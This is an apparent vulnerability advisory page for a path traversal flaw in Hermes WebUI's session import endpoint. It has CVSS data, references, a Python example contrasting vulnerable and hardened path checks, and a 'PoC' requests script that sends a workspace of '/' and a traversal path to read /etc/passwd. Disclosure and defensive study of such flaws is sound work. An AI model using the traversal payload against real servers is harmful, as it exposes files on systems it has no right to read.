Security Vulnerability Report
CVE-2026-22677 CVSS 6.5 MEDIUM

CVE-2026-22677

Published: 2026-05-13 19:17:04
Last Modified: 2026-05-14 16:24:56

Description

Hermes WebUI prior to 0.51.44 - Release T contains a path traversal vulnerability in the session import endpoint that allows authenticated attackers to read arbitrary files by importing a crafted session with an unrestricted workspace value. The import endpoint accepted the workspace field without validating it, so an attacker could set it to a filesystem root that should have been blocked (such as /) and then use relative paths in the session file API to read any file the WebUI process can read. Only low-privilege, authenticated access is required; no user interaction is involved.
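The two-step pattern the description names (an unvalidated workspace root, then a relative path resolved against it) is shown below as an added example written for this page; it is not Hermes WebUI's code and assumes nothing about its real API. `vulnerable_resolve` reproduces the pre-fix behaviour of trusting the workspace value and joining the file path onto it. `naive_blocklist_check` shows why a string deny-list of "blocked" roots is not enough on its own: `/.` and `/etc/..` both canonicalise to `/` but would pass. `safe_resolve` is the hardened form: an allow-list of parent directories for workspaces, canonicalisation with symlinks resolved, and a containment check on the final path. `BLOCKED_ROOTS`, the allow-list, and the temp-directory session tree in `demo()` are all constructed for the example.

```python
import os
import tempfile
from pathlib import Path
from typing import Iterable

# Illustrative deny-list of "blocked" filesystem roots. This is an assumption for the
# example, not Hermes WebUI's actual list.
BLOCKED_ROOTS = {"/", "/etc", "/proc", "/root", "/home"}


class PathTraversalError(ValueError):
    """Raised when a workspace or file path fails the containment checks."""


def vulnerable_resolve(workspace: str, rel_path: str) -> str:
    """Pre-fix behaviour as the advisory describes it: the imported workspace value is
    trusted as-is and the session file path is simply joined onto it. With
    workspace="/" any relative path reaches any file the process can read."""
    return os.path.normpath(os.path.join(workspace, rel_path))


def naive_blocklist_check(workspace: str) -> bool:
    """String-equality deny-list; True means the workspace is rejected. Shown only to
    demonstrate its weakness: "/." and "/etc/.." are not in the set but mean "/"."""
    return workspace in BLOCKED_ROOTS


def canonical(path: str) -> Path:
    """Canonicalise a path: absolute, symlinks resolved, '.' and '..' collapsed."""
    return Path(path).resolve()


def validate_workspace(workspace: str, allowed_roots: Iterable[str]) -> Path:
    """Allow-list check: the canonical workspace must equal one of allowed_roots or be a
    descendant of one. Every spelling of "/" fails this regardless of any deny-list."""
    if not Path(workspace).is_absolute():
        raise PathTraversalError(f"workspace must be absolute: {workspace!r}")
    ws = canonical(workspace)
    for root in allowed_roots:
        r = canonical(root)
        if ws == r or r in ws.parents:
            return ws
    raise PathTraversalError(f"workspace {workspace!r} resolves outside the allowed roots")


def safe_resolve(workspace: str, rel_path: str, allowed_roots: Iterable[str]) -> Path:
    """Hardened file lookup: validate the workspace, refuse absolute file paths, then
    canonicalise the joined path and require it to stay inside the workspace."""
    ws = validate_workspace(workspace, allowed_roots)
    rel = Path(rel_path)
    if rel.is_absolute():
        raise PathTraversalError(f"absolute file path not allowed: {rel_path!r}")
    target = (ws / rel).resolve()
    if target != ws and ws not in target.parents:
        raise PathTraversalError(f"{rel_path!r} escapes workspace {workspace!r}")
    return target


def demo() -> dict:
    """Exercise both behaviours against a constructed session tree in a temp directory."""
    base = Path(tempfile.mkdtemp(prefix="hermes-demo-"))
    sessions_root = base / "sessions"          # the only place workspaces may live
    ws = sessions_root / "session-1"
    ws.mkdir(parents=True)
    (ws / "notes.txt").write_text("hello")     # constructed sample session file
    allowed = [str(sessions_root)]
    results = {
        # The advisory's scenario: workspace "/" plus a relative path reaches /etc/passwd.
        "vulnerable_path": vulnerable_resolve("/", "../../../../../../../../etc/passwd"),
        # The deny-list catches the literal "/" but misses equivalent spellings.
        "blocklist_slash": naive_blocklist_check("/"),
        "blocklist_dot": naive_blocklist_check("/."),
        "blocklist_parent": naive_blocklist_check("/etc/.."),
        # A legitimate lookup inside a valid workspace still works.
        "safe_ok": str(safe_resolve(str(ws), "notes.txt", allowed)),
        "expected_ok": str((ws / "notes.txt").resolve()),
    }
    for label, w, p in [
        ("root_workspace", "/", "../../../../../../../../etc/passwd"),
        ("root_dot_workspace", "/.", "etc/passwd"),
        ("escape_from_valid_workspace", str(ws), "../../../etc/passwd"),
        ("absolute_file_path", str(ws), "/etc/passwd"),
    ]:
        try:
            safe_resolve(w, p, allowed)
            results[label] = "allowed"
        except PathTraversalError:
            results[label] = "rejected"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The order matters: the workspace is validated against an allow-list before any file path is considered, and the file path is checked after full canonicalisation, so neither `..` components nor symlinks inside the workspace can move the final target outside it.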

CVSS Details

CVSS v3.1 Score
6.5
Severity
MEDIUM
CVSS v3.1 Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CVSS v4.0 Score
6.0 (MEDIUM)
CVSS v4.0 Vector
CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Weakness
CWE-22 (Improper Limitation of a Pathname to a Restricted Directory, "Path Traversal")

Configurations (Affected Products)

No CPE configuration data is available from NVD for this CVE. From the description:

Hermes WebUI < 0.51.44 (fixed in 0.51.44 - Release T)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. The endpoint path and request schema are the page's illustration of the description; they have not been confirmed against the Hermes WebUI source.

```python
import requests

# Target URL (replace with the actual target)
target_url = "http://localhost:8080/api/sessions/import"

# Attacker credentials (only low-privilege, authenticated access is required)
username = "attacker"
password = "password"

# Crafted session payload exploiting the path traversal:
# - the workspace is set to the filesystem root, which the import endpoint
#   accepted unchecked before 0.51.44;
# - the file path then traverses relative to that root, so any file readable
#   by the WebUI process can be requested.
payload = {
    "session": {
        "workspace": "/",
        "files": [
            {
                "path": "../../../../../../../../etc/passwd",
                "operation": "read",
            }
        ],
    }
}

try:
    # json= serialises the body and sets Content-Type: application/json
    response = requests.post(
        target_url,
        auth=(username, password),
        json=payload,
        timeout=10,
    )
    if response.status_code == 200:
        print("[+] Exploit successful!")
        print("[+] Response:")
        print(response.json())
    else:
        print(f"[-] Exploit failed with status code: {response.status_code}")
        print(response.text)
except requests.RequestException as e:
    print(f"[-] An error occurred: {e}")
```

References

Commit: https://github.com/nesquena/hermes-webui/commit/f00cb74f776f22f02f5eb6b39dfb389f87cc7fd3
Pull request: https://github.com/nesquena/hermes-webui/pull/2048
Release: https://github.com/nesquena/hermes-webui/releases/tag/v0.51.44
Advisory: https://www.vulncheck.com/advisories/hermes-webui-path-traversal-via-session-import-endpoint

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22677", "sourceIdentifier": "[email protected]", "published": "2026-05-13T19:17:04.347", "lastModified": "2026-05-14T16:24:56.240", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hermes WebUI prior to 0.51.44 - Release T contains a path traversal vulnerability in the session import endpoint that allows authenticated attackers to read arbitrary files by importing a crafted session with an unrestricted workspace value. Attackers can supply a blocked filesystem root in the workspace field and subsequently use relative paths in the session file API to access any file readable by the WebUI process."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/nesquena/hermes-webui/commit/f00cb74f776f22f02f5eb6b39dfb389f87cc7fd3", "source": "[email protected]"}, {"url": "https://github.com/nesquena/hermes-webui/pull/2048", "source": "[email protected]"}, {"url": "https://github.com/nesquena/hermes-webui/releases/tag/v0.51.44", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/hermes-webui-path-traversal-via-session-import-endpoint", "source": "[email protected]"}, {"url": "https://github.com/nesquena/hermes-webui/pull/2048", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}